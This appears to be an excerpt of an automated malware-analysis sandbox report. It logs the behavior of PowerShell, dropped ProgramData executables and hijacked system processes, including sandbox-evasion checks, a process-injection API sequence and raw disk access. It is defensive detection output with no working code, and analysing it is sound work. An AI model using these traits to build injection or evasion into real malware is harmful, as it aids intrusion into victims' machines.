Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SVrB5SO0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

20_2_0000000140001868

Source: C:\ProgramData\SVrB5SO0.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\ProgramData\SVrB5SO0.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599875
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599764
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599656
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599547
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599436
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599301
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599179
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599061
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598953
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598844
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598734
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598625
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598516
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598403
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598296
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598187
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598078
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597969
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597844
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597734
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597625
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597516
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597391
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597266
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597156
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597045
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596937
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596827
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596715
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596608
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596500
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596391
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596266
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596141
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596031
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595922
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595813
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595688
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595578
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595469
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595359
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595247
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595140
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595031
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594922
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594813
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594688
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594578
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1266	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4595	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5132	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7566	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2194	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Window / User API: threadDelayed 4235
Source: C:\ProgramData\SVrB5SO0.exe	Window / User API: threadDelayed 5594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3709
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4960
Source: C:\Windows\System32\dllhost.exe	Window / User API: threadDelayed 509
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9995
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9936
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9865

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_20-8177
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_20-9456
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_20-8180
Source: C:\ProgramData\cZp98.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_16-244

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_20-8121

Source: C:\Windows\System32\wbem\WmiPrvSE.exe	API coverage: 5.0 %
Source: C:\Windows\System32\lsass.exe	API coverage: 5.3 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\notepad.exe TID: 7196	Thread sleep time: -59000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep count: 4595 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 5132 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep count: 7566 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep count: 2194 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7312	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7312	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep count: 34 > 30
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599875s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 7016	Thread sleep count: 4235 > 30
Source: C:\ProgramData\SVrB5SO0.exe TID: 7016	Thread sleep count: 5594 > 30
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599764s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599656s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599547s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599436s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599301s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599179s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -599061s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598953s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598844s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598734s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598625s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598516s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598403s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598296s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598187s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -598078s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597969s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597844s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597734s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597625s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597516s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597391s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597266s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597156s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -597045s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596937s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596827s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596715s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596608s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596500s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596391s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596266s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596141s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -596031s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595922s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595813s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595688s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595578s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595469s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595359s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595247s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595140s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -595031s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -594922s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -594813s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -594688s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -594578s >= -30000s
Source: C:\ProgramData\SVrB5SO0.exe TID: 8168	Thread sleep time: -594469s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 3709 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 4960 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5344	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2304	Thread sleep count: 509 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2304	Thread sleep time: -50900s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3324	Thread sleep count: 9995 > 30
Source: C:\Windows\System32\winlogon.exe TID: 3324	Thread sleep time: -9995000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5736	Thread sleep count: 9936 > 30
Source: C:\Windows\System32\lsass.exe TID: 5736	Thread sleep time: -9936000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7992	Thread sleep count: 9865 > 30
Source: C:\Windows\System32\dwm.exe TID: 7992	Thread sleep time: -9865000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\notepad.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
